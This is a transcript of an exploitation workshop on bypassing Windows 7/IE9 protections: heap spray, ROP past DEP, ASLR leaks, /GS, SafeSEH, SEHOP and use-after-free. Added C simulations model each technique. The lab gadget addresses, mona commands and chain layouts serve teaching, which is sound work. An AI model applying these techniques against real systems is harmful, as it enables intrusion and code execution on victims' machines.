Sintsov advanced exploitation in win32

Transcript

  • 1. Adv. Exploitation in win32. 20 November 2012, Moscow, RUSSIA. By Alexey Sintsov, NOKIA Security, Privacy and Continuity, @asintsov
  • 2. author.getBackground();
    • Senior Security Engineer at
    • Writer at
    • Co-Founder of
    • Ideology and co-organizer of
  • 3. workshop = new Workshop();
    • Smashing the stack (classic BoF)
    • Use-After-Free
    • Heap Spray
    • DEP
    • ASLR
    • GS/SafeSEH/SEHOP
    => calc.exe
  • 4. workshop.getAgenda();
    1. BoF
    2. HeapSpray
    3. DEP/ROP – Exploit_1
    4. /GS
    5. SafeSEH
    6. SEHOP
    7. vTable …
    8. ASLR by leak – Exploit_2 (DEP/ASLR/GS/safeSEH/SEHOP)
    9. UAF
    10. Exploit_3 (DEP/ASLR/GS/safeSEH/SEHOP)
  • 5. workshop.getExcluded();
    • Shellcode dev.
    • Metasploit (btw, there was a workshop by Rick!)
    • Sandboxing
    • EMET bypass
  • 6. environment.getItems();
    Target?
    • IE9
    • Windows 7
    Tools?
    • Immunity Debugger: http://immunityinc.com/products-immdbg.shtml
    • mona.py: http://redmine.corelan.be/projects/mona/repository/raw/trunk/1.8/mona.py
    • Notepad(++) / vi
  • 7. workshop.loadLab();
    ie_lib_v2.zip
    • part_x
      – bin
        • Ex1 -> DEP/ASLR_1
        • Ex2 -> GS/DEP/ASLR_1
        • Ex3 -> vTable/ASLR_TRUE
        • Ex4 -> UAF/FULL
      – Exercises
      – Exploits
    Ex0.
    1) Install nptest2 Ex.1 plugin (part_1/bin/ex1.bat)
    2) Open in IE /part1/exercises/ex0/demo.htm
    3) See sources…
  • 8. Hey! Ho! Let’s go!
  • 9. theory.getList();
    Bug                                      | Impact      | Payload
    BoF in the stack                         | RET, SEH    | Stack, Heap
    BoF in the Heap                          | Flink       | Heap
    Format strings                           | RET, SEH    | Stack, Heap
    Memory corruption / Use after free / etc | Bad pointer | Heap
  • 10. theory.getList().getMitig()[0]; (same table, first mitigations added)
    • Stack cookies
    • Safe unlinking
    • Heap cookies
  • 11. theory.getList().getMitig()[1]; (adds)
    • SEH handler validation
    • SEH chain validation
  • 12. theory.getList().getMitig()[2]; (adds)
    • DEP
    • ASLR
  • 13. theory.getList().getMitig()[2].agenda; (the mitigations covered in this workshop)
    • Stack cookies
    • SEH handler validation
    • SEH chain validation
    • DEP
    • ASLR
  • 14. theory.getBof();
      char* func(char *input){
          char buff[255];
          memcpy(buff, input, strlen(input)*sizeof(char)); /* no bound check: copies as many bytes as the attacker supplies */
          return buff;
      }
    Stack for func(): buff | blah | C | RET
    BoF (memcpy): buff | blah | C | RET, everything after buff overwritten by the input
    Ex1.
    1) Open in IE /part1/exercises/crash.html
    2) Wait for alert();
    3) Attach to IE tab (Message)
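The frame drawn above (buff, then the saved frame pointer, then RET) can be modelled as a struct so that the overwrite is observable instead of crashing. The following is an added example written for this transcript, not code from the workshop or the nptest2 plugin: it copies an input whose length the attacker controls, exactly as func() does, shows the offset of RET from buff and the payload that replaces RET with 0x0C0C0C0C, and puts the bounded copy beside it. The frame layout, the 0xDEADBEEF placeholder return address and the little-endian host are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Model of func()'s frame as drawn on the slide: buff, then the saved
 * frame pointer ("blah"), then the return address (RET). A struct stands in
 * for the real stack so the overwrite can be inspected instead of crashing. */
struct frame {
    char     buff[255];
    uint32_t blah;      /* saved EBP in a real x86 frame */
    uint32_t ret;       /* return address */
};

/* Same defect as func(): the copy length comes from the input, not from the
 * buffer. Written as a loop rather than memcpy so a fortified libc does not
 * abort this demo; the effect is what memcpy(buff, input, strlen(input)) does. */
static void vuln_copy(struct frame *f, const uint8_t *input, size_t len)
{
    uint8_t *dst = (uint8_t *)f->buff;
    for (size_t i = 0; i < len; i++)
        dst[i] = input[i];              /* len > sizeof buff spills into blah, then ret */
}

/* Hardened version: bound the copy by the destination and always terminate. */
static int safe_copy(struct frame *f, const uint8_t *input, size_t len)
{
    if (len >= sizeof f->buff)
        return -1;                      /* reject instead of truncating silently */
    memcpy(f->buff, input, len);
    f->buff[len] = '\0';
    return 0;
}

/* Bytes between the start of buff and RET: the offset a pattern_offset search reports. */
size_t ret_offset(void) { return offsetof(struct frame, ret); }

/* Payload: padding up to RET, then the new return address in little-endian order
 * (host order is assumed to be little-endian, as on x86). */
size_t build_payload(uint8_t *out, size_t cap, uint32_t new_ret)
{
    size_t off = ret_offset();
    if (off + sizeof new_ret > cap) return 0;
    memset(out, 'A', off);
    memcpy(out + off, &new_ret, sizeof new_ret);
    return off + sizeof new_ret;
}

/* Runs the vulnerable copy on the payload and reports the RET value afterwards. */
uint32_t demo_vuln(uint32_t new_ret)
{
    struct frame f = {0};
    uint8_t payload[512];
    size_t n = build_payload(payload, sizeof payload, new_ret);
    f.ret = 0xDEADBEEFu;                /* the legitimate return address (placeholder) */
    vuln_copy(&f, payload, n);
    return f.ret;
}

/* Same payload against the hardened copy: rejected, RET untouched. */
int demo_safe(uint32_t new_ret, uint32_t *ret_after)
{
    struct frame f = {0};
    uint8_t payload[512];
    size_t n = build_payload(payload, sizeof payload, new_ret);
    f.ret = 0xDEADBEEFu;
    int rc = safe_copy(&f, payload, n);
    *ret_after = f.ret;
    return rc;
}
```

With this layout demo_vuln(0x0C0C0C0C) returns 0x0C0C0C0C: 260 bytes of padding cross buff and the saved frame pointer, and the next four bytes become the return address, which is the jump into the heap spray on the IE6 slide that follows.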
  • 15. theory.Target['IE6'].howto();
    • Shellcode
    • HeapSpray
    • Ret/Jmp to Heap
    • Profit
  • 16. theory.getShellcode();
    • Assembler instructions
    • Program
    • Shell 8-)
    EIP ---------> asm code that does something bad
  • 17. theory.getHeap();
    Process memory:
    - Modules
      - Vuln. module
      - System modules
    - Heap pages (0x0c0c0c0c lands here)
      - NOP sled
      - Shellcode
  • 18. theory.getHeap('IE9');
    • Array of strings (substring()…)…
    String in memory: Header (0x10) | 0061 0061 0061 0061 0061 0061 0061 0061 … | 00 00
  • 19. theory.getAntiHeap();
    Nozzle: if block_parts contains asm_parts/NOP_sleds then No_Allocation!
    Bubble: if next_block_parts eq prev_block_parts then No_Allocation!
    Task 1: part1\exercises\ex2\heap.htm
    This HeapSpray doesn't work in IE9 because of 'bubble'. Change the code and bypass it!
  • 20. theory.getAnotherSpray();
    • ActionScript (Flash)
    • Images
    • HTML5
    • …
  • 21. workshop.getMitigation('DEP');
    Question: what pages are still E? (RW-)
    Add to ex2 (heap.htm): RET to 0x0C0C0C0C…
    • Stack – not E
    • Heap – not E
    • RET -> ???
  • 22. theory.getBypass('DEP');
    retn2libc:
    • Push command: WinExec
    • Disable DEP by call: NtSetInformationProcess, SetProcessDEPPolicy (not with Permanent DEP, as in IE)
    • Create/change access: VirtualAlloc, VirtualProtect, MapViewOfFile
    • Copy payload into thread: WriteProcessMemory
    Each of these is a RETN into a function at a known address, which ASLR takes away.
  • 23. workshop.getMitigation('ASLR');
    Where is VP?
    Before reboot: APP.DLL, NTDLL.DLL, APP2.DLL, KERNEL32.DLL
    After reboot:  KERNEL32.DLL, APP2.DLL, NTDLL.DLL, APP.DLL
  • 24. workshop.getBypass('ASLR')[0];
    retn2libc: system libs like kernel32, urlmon, ntdll etc. are at unknown addresses (ASLR), and we can't use them for retn2libc because we need to know the address of functions like VirtualAlloc.
    … but our lib DOES NOT support ASLR!
    Task 2: Find a static pointer to VirtualProtect
  • 25. theory.getROP()[0];
    • Find VirtualProtect (VP) address (static pointer to VP)
    • Find shellcode in memory (HeapSpray)
    • Prepare params for VP (ROP)
    • Call VP (ROP)
    • Give control to shellcode (JMP ESP)
    All this can be done by Return Oriented Programming
  • 26. theory.getROP()[1];
    BoF with ROP: Buff | Blah | RET | ROP | ROP | ROP | ROP | ROP
    «Write at 0x0A0A0A0A value 0x10»
    CODE (what we want)        CPU (gadgets)                    STACK (ROP chain)
    POP EDI                    0x7C010102: RETN                 0x8C010103
    MOV EAX, 0x10              0x8C010103: POP EDI              0x0A0A0A0A
    MOV [EDI], EAX             0x8C010104: RETN                 0x8C020105
                               0x8C020105: POP EAX              0xFFFFFFF0
    MOV EAX, 0x10 is done as   0x8C020106: RETN                 0x8C030107
    POP EAX 0xFFFFFFF0 and     0x8C030107: NEG EAX              0x8C040109
    NEG EAX                    0x8C030108: RETN
                               0x8C040109: MOV [EDI], EAX
                               0x8C05010B: RETN
  • 27. theory.getROP()[2]; StackPivot
    • You do not control the stack
    • You do not know addresses in the stack
    • Your ROP is in the Heap
    • You are exploiting SEH
    In those cases you should change ESP. It must point to a page you control. Useful gadgets:
    • ADD EBP, xxx / LEAVE / RETN
    • MOV ESP, xxx / RETN
    • ADD or SUB ESP, xxx / RETN
    • XCHG ESP, xxx / RETN
    • etc
  • 28. workshop.getROP()[3];
    • part1\exercises\ex3\exploit.htm
    • !mona noaslr
    • !mona rop -m nptest2 (do not run, results are in: /part_1/rop/ex1/*.txt)
    • HeapSpray (line 44)
    • HeapSpray with ROP (line 80) by using:
      1. 0x41461605 : # MOV ESP,EBP # POP EBP # RETN
      2. 0x414619AF : # POP EBP # RETN 8
      (for stack pivot)
    • Build BoF string (call VirtualProtect/Alloc)
    • Exploit it!
    Task 3:
    1. Fix shellcode
    2. Build stackPivot and ROP
    3. Make HeapSpray
    4. Get calc.exe!
    ESP = 0x0c0c0c0c -> ROP_NOP_SLED address; ROP_NOP_SLED = 0x414445ab # RETN
    HEAP SPRAY: [ROP_NOP_SLED …][ROP][Shellcode]
    Notepad roxXx
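Slides 22 to 28 describe three things a ROP chain must do under DEP: write without null bytes (the POP/NEG/MOV chain of slide 26), pivot ESP into the sprayed heap (slide 27), and lay out a stdcall frame for VirtualProtect so that the function "returns" into the now-executable shellcode. The following is an added example written for this transcript, not the workshop's exploit: a tiny 32-bit machine model with one stack page and one heap page that executes exactly those gadget types. The gadget addresses for POP/NEG/MOV are the ones on slide 26; the XCHG EAX,ESP pivot address, the VirtualProtect address, the page addresses and the assumption that EAX holds an attacker-chosen heap address at pivot time are made up for the model.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* One stack page and one heap page are the only mapped memory in the model. */
#define STACK_BASE 0x0012F000u
#define HEAP_BASE  0x0A0A0000u
#define PAGE       0x1000u
#define PAGE_EXECUTE_READWRITE 0x40u

/* Gadgets from slide 26; the pivot gadget and the VirtualProtect address are assumptions. */
#define G_RETN      0x7C010102u   /* RETN                 (the overwritten RET points here) */
#define G_POP_EDI   0x8C010103u   /* POP EDI ; RETN */
#define G_POP_EAX   0x8C020105u   /* POP EAX ; RETN */
#define G_NEG_EAX   0x8C030107u   /* NEG EAX ; RETN */
#define G_MOV_MEM   0x8C040109u   /* MOV [EDI],EAX ; RETN */
#define G_XCHG_ESP  0x8C05010Du   /* XCHG EAX,ESP ; RETN  (stack pivot, assumed) */
#define VIRTUALPROTECT 0x7C801AD4u /* static pointer to VP, assumed */

struct vm {
    uint8_t  stack[PAGE], heap[PAGE];
    int      heap_exec;              /* DEP: heap pages start RW, not executable */
    uint32_t eax, edi, esp;
};

static uint8_t *vm_ptr(struct vm *m, uint32_t a)
{
    if (a >= STACK_BASE && a + 4 <= STACK_BASE + PAGE) return m->stack + (a - STACK_BASE);
    if (a >= HEAP_BASE  && a + 4 <= HEAP_BASE  + PAGE) return m->heap  + (a - HEAP_BASE);
    return NULL;                     /* unmapped */
}
static uint32_t rd32(struct vm *m, uint32_t a) { uint32_t v = 0; uint8_t *p = vm_ptr(m, a); if (p) memcpy(&v, p, 4); return v; }
static void     wr32(struct vm *m, uint32_t a, uint32_t v) { uint8_t *p = vm_ptr(m, a); if (p) memcpy(p, &v, 4); }
static uint32_t pop(struct vm *m) { uint32_t v = rd32(m, m->esp); m->esp += 4; return v; }
static void load(struct vm *m, uint32_t at, const uint32_t *w, size_t n) { for (size_t i = 0; i < n; i++) wr32(m, at + 4 * i, w[i]); }

/* Every gadget ends in RETN, so control always continues at whatever ESP points to.
 * Returns the first non-gadget address reached if that page is executable, else 0 (DEP fault or unmapped). */
static uint32_t run(struct vm *m)
{
    uint32_t eip = pop(m);
    for (int steps = 0; steps < 64; steps++) {
        switch (eip) {
        case G_RETN:     break;
        case G_POP_EDI:  m->edi = pop(m); break;
        case G_POP_EAX:  m->eax = pop(m); break;
        case G_NEG_EAX:  m->eax = 0u - m->eax; break;                  /* 0xFFFFFFF0 -> 0x10 */
        case G_MOV_MEM:  wr32(m, m->edi, m->eax); break;
        case G_XCHG_ESP: { uint32_t t = m->esp; m->esp = m->eax; m->eax = t; break; }
        case VIRTUALPROTECT: {
            /* stdcall frame the chain must lay out: [ret][lpAddress][dwSize][flNewProtect][lpflOldProtect] */
            uint32_t ret = pop(m), addr = pop(m), size = pop(m), prot = pop(m), old = pop(m);
            if (addr >= HEAP_BASE && size <= PAGE && addr + size <= HEAP_BASE + PAGE
                && prot == PAGE_EXECUTE_READWRITE && vm_ptr(m, old) != NULL)
                m->heap_exec = 1;
            eip = ret;                     /* VirtualProtect returns into the word after the call */
            continue;
        }
        default:
            if (eip >= HEAP_BASE && eip < HEAP_BASE + PAGE && m->heap_exec) return eip;
            return 0;
        }
        eip = pop(m);
    }
    return 0;
}

/* Slide 26: "write 0x10 at 0x0A0A0A0A" with no null byte anywhere in the chain. */
static const uint32_t WRITE_CHAIN[] = {
    G_RETN, G_POP_EDI, 0x0A0A0A0Au, G_POP_EAX, 0xFFFFFFF0u, G_NEG_EAX, G_MOV_MEM
};

int chain_has_null_byte(const uint32_t *c, size_t n)
{
    for (size_t i = 0; i < n; i++)
        for (int b = 0; b < 4; b++)
            if (((c[i] >> (8 * b)) & 0xFFu) == 0) return 1;
    return 0;
}

uint32_t demo_write_what_where(void)
{
    struct vm m = {0};
    m.esp = STACK_BASE + 0x100;          /* ESP right after the overwritten RET was popped */
    load(&m, m.esp, WRITE_CHAIN, sizeof WRITE_CHAIN / 4);
    run(&m);                              /* ends when the final RETN pops a 0 and faults */
    return rd32(&m, 0x0A0A0A0Au);
}

/* Slides 22 and 27: the ROP lives in the sprayed heap, so pivot ESP there first, then either
 * call VirtualProtect before entering the shellcode (call_vp=1) or return straight into it
 * (call_vp=0, which is what DEP stops). */
uint32_t demo_dep_bypass(int call_vp)
{
    struct vm m = {0};
    uint32_t rop = HEAP_BASE + 0x100, shellcode = HEAP_BASE + 0x200, scratch = HEAP_BASE + 0x800;
    m.eax = rop;                          /* assumed: attacker controls the pivot's source register */
    m.esp = STACK_BASE + 0x100;
    uint32_t pivot[] = { G_XCHG_ESP };
    load(&m, m.esp, pivot, 1);            /* the overwritten RET */
    uint32_t vp_chain[] = { VIRTUALPROTECT, shellcode, HEAP_BASE, PAGE, PAGE_EXECUTE_READWRITE, scratch };
    uint32_t naive[]    = { shellcode };
    if (call_vp) load(&m, rop, vp_chain, 6); else load(&m, rop, naive, 1);
    return run(&m);
}
```

The NEG step is the reason the chain survives a string copy: pushing 0x00000010 directly would put three null bytes on the stack, while 0xFFFFFFF0 followed by NEG EAX produces the same value without any. In demo_dep_bypass the word right after the VirtualProtect address is where VP returns, so it is the shellcode address; the four words after it are VP's arguments in stdcall order, and lpflOldProtect must point at writable memory or the call fails.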
  • 29. workshop.pause();
  • 30. workshop.continue(); • GS • SEHOP • safeSEH
  • 31. theory.getMitigation('GS')[0];  C | buff | blah | RET
    1) Calc value C (cookie)
  • 32. theory.getMitigation('GS')[1];  C | buff | blah | RET
    1) Calc value C (cookie)
    2) Save C in the .data
  • 33. theory.getMitigation('GS')[2];  C | buff | blah | C | RET
    1) Calc value C (cookie)
    2) Save C in the .data
    3) Place C before RET
  • 34. theory.getMitigation('GS')[3];  C | buff | blah | C | RET
    1) Calc value C (cookie)
    2) Save C in the .data
    3) Place C before RET
    4) Strcpy
  • 35. theory.getMitigation('GS')[4];  C != C | buff | blah | C | RET
    1) Calc value C (cookie)
    2) Save C in the .data
    3) Place C before RET
    4) Strcpy
    5) Before RET – check C from the stack against C from .data
    + /GS:
    1) Install nptest2 Ex.2 plugin (/part1/bin/ex2.bat)
    2) Run exploit…
  • 36. theory.getBypass('GS');
    Bypass:
    • Entropy / static cookie
    • Rewrite cookie in .data: mov [ecx], edx -> CRASH
    • vTable rewrite: call [ecx] -> CRASH
    • SEH: rewrite and CRASH
  • 37. theory.getSEH();
    Before BoF: Buff | blah | C | RET | Next SEH | SEH -> Handler's code
  • 38. workshop.callSEH();
    Task 4: part1\exercises\ex4\seh.htm
    Trigger SEH before the /GS check…
    Before: Buff | ns | seh | C | RET
    After:  Buff | ns | seh | C | RET (ns and seh overwritten by the overflow)
    Re-write SEH!
  • 39. theory.getMitigation('SEHOP');
    Next SEH -> SEH handler1
    Next SEH -> SEH handler2
    Next SEH -> SEH handler3
    Next SEH -> SEH handler4
    0xFFFFFFFF, SEH = ntdll!FinalExceptionHandler
  • 40. theory.getBypass('SEHOP');
    Bypass (also a /GS bypass):
    • vTable rewrite: call [ecx + x] -> CRASH
    • Leak ntdll/orig. stack addr and use it in heapSpray/nSEH:
      nSEH -> [0xFFFFFFFF | ntdll!FinalExceptHandler]
      SEH -> ROP/Shellcode
  • 41. theory.getMitigation('safeSEH');
    SafeSEH table for nptest2: SEH1, SEH2, SEH3, SEH4
    Next SEH -> SEH1 handler1
    Next SEH -> SEH2 handler2
    Next SEH -> SEH3 handler3
    Next SEH -> SEH4 handler4
    0xFFFFFFFF, SEH = ntdll!FinalExceptionHandler
  • 42. theory.getBypass('safeSEH');
    Bypass (also a /GS and SEHOP bypass):
    • vTable rewrite: call [ecx + x] -> CRASH
    • Pointer on a module without SafeSEH
    Task 5: Find how to trigger the vTable call?
  • 43. workshop.loadFull(); GS/SEHOP/SafeSEH/DEP/ASLR
    • part1\bin\Ex4.bat
    • Now nptest2 supports ASLR too!
    • !mona noaslr
    We can't build ROP, we do not know any address…
  • 44. workshop.getBypass('ASLR')[1];
    • Modules without ASLR (static base address) – call functions from modules with unknown address
    • Memory leakage bugz
    • Rewrites of low bytes
    • Brute force of high bytes
    • Spraying: javascript Heap Spray, java heap spray, .NET, JIT Spray, e.t.c.
    Task 6: What about Ex0? What can we do?
    Good examples: http://www.vupen.com/blog/
  • 45. workshop.exploitVTable();
    Task 7: part1\exercises\ex5\final.htm
    • Exploit Leak!
    • Build ROP by leaked nptest2 address
    • Make pwning ESP (stack pivot): ESP -> HeapSpray -> ROP
    • Make heap executable
    • Run shellcode!
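Slides 37 to 42 describe the two checks the exception dispatcher runs on an overwritten SEH record: SEHOP walks the Next pointers and demands that the chain end at 0xFFFFFFFF with ntdll!FinalExceptionHandler, and SafeSEH refuses a handler inside an image that has a table unless the handler is listed. The following is an added example written for this transcript, not workshop code: it models both checks over a simulated 32-bit stack and runs the three attacks the slides mention (plain overwrite, handler in a module without SafeSEH, forged chain built from a leaked ntdll address and stack address). The module bases, the ntdll offset of the final handler, the SafeSEH table contents for nptest2, the extra "noseh" module and the treatment of handlers outside any image (DEP decides, stack and heap are non-executable) are assumptions of the model.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define STACK_BASE    0x0012F000u
#define STACK_WORDS   256u
#define END_OF_CHAIN  0xFFFFFFFFu
#define NTDLL_BASE    0x77F00000u              /* assumed; on a real box ASLR picks it, hence the leak on slide 40 */
#define FINAL_HANDLER (NTDLL_BASE + 0x1234u)   /* ntdll!FinalExceptionHandler, assumed offset */
#define NPTEST2_BASE  0x41400000u              /* nptest2 without ASLR; matches the 0x414xxxxx gadgets on the slides */
#define NOSEH_BASE    0x10000000u              /* some module built without SafeSEH, assumed */
#define FAKE_RECORD   0x0012F180u              /* where the overflow data lands; known only after the stack-address leak */

struct module { uint32_t base, size; const uint32_t *table; size_t n; };   /* table == NULL: no SafeSEH */

static const uint32_t ntdll_table[]   = { FINAL_HANDLER };
static const uint32_t nptest2_table[] = { NPTEST2_BASE + 0x1000u, NPTEST2_BASE + 0x1050u,
                                          NPTEST2_BASE + 0x10A0u, NPTEST2_BASE + 0x10F0u };   /* SEH1..SEH4 */

struct process {
    uint32_t stack[STACK_WORDS];     /* simulated stack; an EXCEPTION_REGISTRATION is {Next, Handler} */
    struct module mods[3];
    int dep;
};

static uint32_t *record(struct process *p, uint32_t a)
{
    if (a < STACK_BASE || a + 8 > STACK_BASE + 4 * STACK_WORDS || a % 4) return NULL;
    return &p->stack[(a - STACK_BASE) / 4];
}

/* SafeSEH (handler validation): inside an image with a table the handler must be listed; inside an
 * image without a table anything goes; outside every image this model lets DEP decide and treats
 * stack and heap as non-executable. */
int safeseh_ok(const struct process *p, uint32_t handler)
{
    for (size_t i = 0; i < 3; i++) {
        const struct module *m = &p->mods[i];
        if (handler < m->base || handler >= m->base + m->size) continue;
        if (!m->table) return 1;
        for (size_t j = 0; j < m->n; j++) if (m->table[j] == handler) return 1;
        return 0;
    }
    return p->dep ? 0 : 1;
}

/* SEHOP (chain validation): follow Next from the head; every record must lie on the stack and
 * the walk must end at {0xFFFFFFFF, ntdll!FinalExceptionHandler}. */
int sehop_ok(struct process *p, uint32_t head)
{
    uint32_t cur = head;
    for (unsigned hops = 0; hops < STACK_WORDS; hops++) {
        uint32_t *r = record(p, cur);
        if (!r) return 0;                              /* Next was overwritten with garbage */
        if (r[0] == END_OF_CHAIN) return r[1] == FINAL_HANDLER;
        cur = r[0];
    }
    return 0;                                          /* cycle */
}

/* What the dispatcher does with the first record: the handler it would call, or 0 if refused. */
uint32_t dispatch(struct process *p, uint32_t head)
{
    uint32_t *r = record(p, head);
    if (!r || !sehop_ok(p, head) || !safeseh_ok(p, r[1])) return 0;
    return r[1];
}

static void setup(struct process *p, int dep)
{
    memset(p, 0, sizeof *p);
    p->dep = dep;
    p->mods[0] = (struct module){ NTDLL_BASE,   0x100000u, ntdll_table,   1 };
    p->mods[1] = (struct module){ NPTEST2_BASE, 0x100000u, nptest2_table, 4 };
    p->mods[2] = (struct module){ NOSEH_BASE,   0x100000u, NULL,          0 };
    uint32_t *a = record(p, 0x0012F100u), *b = record(p, 0x0012F200u);   /* intact chain */
    a[0] = 0x0012F200u; a[1] = NPTEST2_BASE + 0x1000u;                    /* nptest2's SEH1 */
    b[0] = END_OF_CHAIN; b[1] = FINAL_HANDLER;
}

uint32_t scenario_intact(void) { struct process p; setup(&p, 1); return dispatch(&p, 0x0012F100u); }

/* The over-write from slide 38 reaches the first record: nSEH and SEH become attacker data.
 * With forge_final the attacker also drops {0xFFFFFFFF, FINAL_HANDLER} at FAKE_RECORD, which
 * needs both the ntdll address and the stack address from slide 40's leak. */
uint32_t scenario_overwrite(uint32_t nseh, uint32_t seh, int forge_final, int dep)
{
    struct process p;
    setup(&p, dep);
    uint32_t *a = record(&p, 0x0012F100u);
    a[0] = nseh; a[1] = seh;
    if (forge_final) { uint32_t *f = record(&p, FAKE_RECORD); f[0] = END_OF_CHAIN; f[1] = FINAL_HANDLER; }
    return dispatch(&p, 0x0012F100u);
}
```

Run against the model, the classic "nSEH = 0x41414141" overwrite is refused by SEHOP before SafeSEH is even consulted; a forged chain with the correct final record passes SEHOP, but the handler still has to live in a module without a SafeSEH table (or, without DEP, in sprayed memory) to be called. That is why slide 40 needs two leaks: the ntdll address for the final handler and the stack address so nSEH can point at the forged record.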
  • 46. workshop.pause();
  • 47. workshop.continue(); • Use-After-Free
  • 48. theory.getUAF()[0];
    Process memory: Modules (object with pointer, system modules), Heap pages; CALL 0x0C0C0C0C
      Object *obj = (Object *)malloc(sizeof(Object));
      obj->callMethod();
      free(obj);
      HeapSpray(0x0c0c0c0c);
      obj->callMethod();   // stale pointer: the call now goes into the spray
  • 49. theory.getUAF()[1];
    Heap: some objects, the object with pointer, attacker's blocks
    1) Free();
    2) Spray();
    SIZE MATTERS
  • 50. workshop.getUAF();
    1. part2\bin\uaf.bat
    2. part2\exercises\Fig1\demo.htm
      vulnPlugin2.InitRed(31337, 0x31333331);
      var a = vulnPlugin2.CallRed();
      alert(a); // a = 31337
      vulnPlugin2.FreeRed();
      vulnPlugin2.InitGreen(666, 0x31333331);
      var b = vulnPlugin2.CallRed();
      alert(b); // b = ???
    Task 8: Find UAF
    Task 9: Rewrite object by using InitString();
    Full armored: ALSR/DEP/GS/SEH/SEHOP
    Useless ROP
  • 51. theory.getLeak()[0];
    Obj1, freed… (Data, Pointer)
    Obj2, same size…
    Obj2.ReadData() ---- ???
  • 52. theory.getLeak()[1];
    Obj1, freed… (Data, Pointer)
    Obj2, same size…
    Obj1.ReadData() ---- ???
    Task 10: Get leak by using InitOther();
  • 53. workshop.exploitUAF();
    Task 11: part2\exercises\Fig2\final.htm
    • Exploit Leak!
    • Build ROP by leaked address
    • Make pwning ESP (stack pivot): ESP -> HeapSpray -> ROP
    • Make heap executable
    • Run shellcode!
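Slides 48 to 52 use one pattern twice: free an object whose pointer the program keeps, reclaim its chunk with an allocation of the same size, then either call through the stale pointer (hijack) or read through it (leak). The following is an added example written for this transcript, not the workshop's nptest2/vulnPlugin2 code: a native C version of the same sequence that runs on a normal allocator, with a spray-size parameter to show why "SIZE MATTERS". The Red object layout, the pwned() target, the 64-block spray and the reliance on the allocator handing the freed chunk back for a same-size request (true for glibc's tcache; other allocators may differ) are assumptions.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* The plugin's "Red" object, modelled: a vtable-like code pointer first, then data. */
typedef struct obj { int (*call)(struct obj *); uint32_t value; char pad[24]; } obj_t;

static int red_method(obj_t *o) { return (int)o->value; }   /* what CallRed() reaches */
static int pwned(obj_t *o) { (void)o; return 0x31337; }      /* where the attacker wants to land */

/* Slide 48, steps 1-4: allocate, free, spray same-size blocks, call through the stale pointer.
 * spray_size shows why size matters: only same-size blocks reclaim the freed chunk.
 * Returns what the stale call returned, or -1 if no sprayed block landed on the freed object. */
int uaf_hijack(size_t spray_size)
{
    obj_t *red = malloc(sizeof *red);
    red->call = red_method;
    red->value = 31337;
    uintptr_t freed_at = (uintptr_t)red;
    free(red);                                   /* FreeRed(): pointer kept, memory released */

    unsigned char *blocks[64];
    int hit = -1, result = -1;
    uintptr_t target = (uintptr_t)pwned;
    for (int i = 0; i < 64; i++) {              /* InitGreen()/InitString(): attacker data */
        blocks[i] = malloc(spray_size);
        memset(blocks[i], 0x41, spray_size);
        if (spray_size >= sizeof target)
            memcpy(blocks[i], &target, sizeof target);   /* lands where obj->call used to be */
        if ((uintptr_t)blocks[i] == freed_at) hit = i;
    }
    if (hit >= 0) {
        volatile obj_t *stale = red;             /* CallRed() on the freed object */
        result = stale->call((obj_t *)red);      /* now dispatches to pwned() */
    }
    for (int i = 0; i < 64; i++) free(blocks[i]);
    return result;
}

/* Slides 51-52: Obj1 is freed, Obj2 of the same size lands on it carrying a code pointer;
 * reading Obj1's first word through the stale pointer returns Obj2's pointer (the leak).
 * Returns the leaked value, or 0 if the allocator did not reuse the chunk. */
uintptr_t uaf_leak(void)
{
    obj_t *obj1 = malloc(sizeof *obj1);
    obj1->call = red_method; obj1->value = 1;
    uintptr_t freed_at = (uintptr_t)obj1;
    free(obj1);
    obj_t *obj2 = malloc(sizeof *obj2);          /* InitOther(): same size, holds a pointer into the module */
    obj2->call = red_method; obj2->value = 2;
    uintptr_t leaked = 0;
    if ((uintptr_t)obj2 == freed_at) {
        volatile obj_t *stale = obj1;
        leaked = (uintptr_t)stale->call;         /* Obj1.ReadData() */
    }
    free(obj2);
    return leaked;
}
```

uaf_hijack(sizeof(obj_t)) returns 0x31337 because the first sprayed block is handed the chunk Red occupied, so the stale call reads the attacker's pointer from offset 0; uaf_hijack(4 * sizeof(obj_t)) returns -1 because a larger request is served from a different bin and never touches the freed chunk. uaf_leak() returns the address of red_method: with a known RVA that is enough to recover the module base that Task 11's ROP chain is built from.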
  • 54. delete workshop;twitter.com/asintsov alexey.sintsov@nokia.com www.defcon-russia.ru www.zeronights.ru
